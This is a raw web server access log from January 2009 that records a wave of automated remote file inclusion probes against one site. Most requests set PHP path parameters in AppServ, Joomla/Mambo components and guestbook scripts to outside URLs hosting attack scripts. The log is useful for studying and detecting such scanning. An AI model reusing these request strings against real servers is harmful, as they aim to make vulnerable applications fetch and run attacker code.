81.21.69.243 - - [06/Jan/2009:08:15:48 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:15:48 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:15:51 -0800] "GET /logs/access_080824.log//index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:15:51 -0800] "GET /logs//index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:15:53 -0800] "GET /index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 200 94950 "-" "libwww-perl/5.812" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:15:53 -0800] "GET /logs/access_080401.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:56 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:56 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:56 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:16:03 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:16:03 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:16:06 -0800] "GET /logs/access_090103.log//index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:16:18 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:16:22 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:16:29 -0800] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:16:31 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:16:31 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:16:31 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:16:33 -0800] "GET /includes/settings.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:16:33 -0800] "GET /logs/includes/settings.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:16:33 -0800] "GET /logs/access_080716.log/includes/settings.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:08:16:34 -0800] "GET /logs/access_080912.log/includes/settings.inc.php?include_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:38 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:38 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:38 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:41 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:42 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:42 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:16:42 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:43 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:43 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:44 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:47 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:48 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:48 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:52 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:52 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:52 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:16:52 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:52 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:16:53 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:17:06 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:17:08 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:17:09 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:17:13 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:39 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:39 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:40 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:44 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:44 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:17:44 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:06 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:06 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:18:06 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:06 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:18:07 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:18:09 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:13 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:13 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:13 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:13 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:13 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:14 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:18:15 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:18:15 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:18:15 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:18:16 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:18:23 -0800] "GET /logs/access_080314.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:18:24 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:18:24 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rappelz.pzcci.org//media/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [06/Jan/2009:08:18:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rappelz.pzcci.org//media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:27 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:34 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:18:37 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.49 - - [06/Jan/2009:08:18:37 -0800] "GET /logs/access_080903.log//?DOCUMENT_ROOT=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [06/Jan/2009:08:18:38 -0800] "GET /?DOCUMENT_ROOT=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 94805 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [06/Jan/2009:08:18:40 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 81177 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:18:41 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:18:47 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:18:47 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:18:47 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:19:06 -0800] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:13 -0800] "GET /logs/access_080530.log%20%20//?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:14 -0800] "GET /logs//?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:14 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:14 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:15 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:15 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:16 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:16 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:16 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:16 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:17 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:17 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:17 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:17 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:18 -0800] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:18 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:18 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:19 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:19 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:19 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:19 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:20 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:20 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:20 -0800] "GET /logs/access_080530.log%20%20//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:20 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:19:21 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 200 81177 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
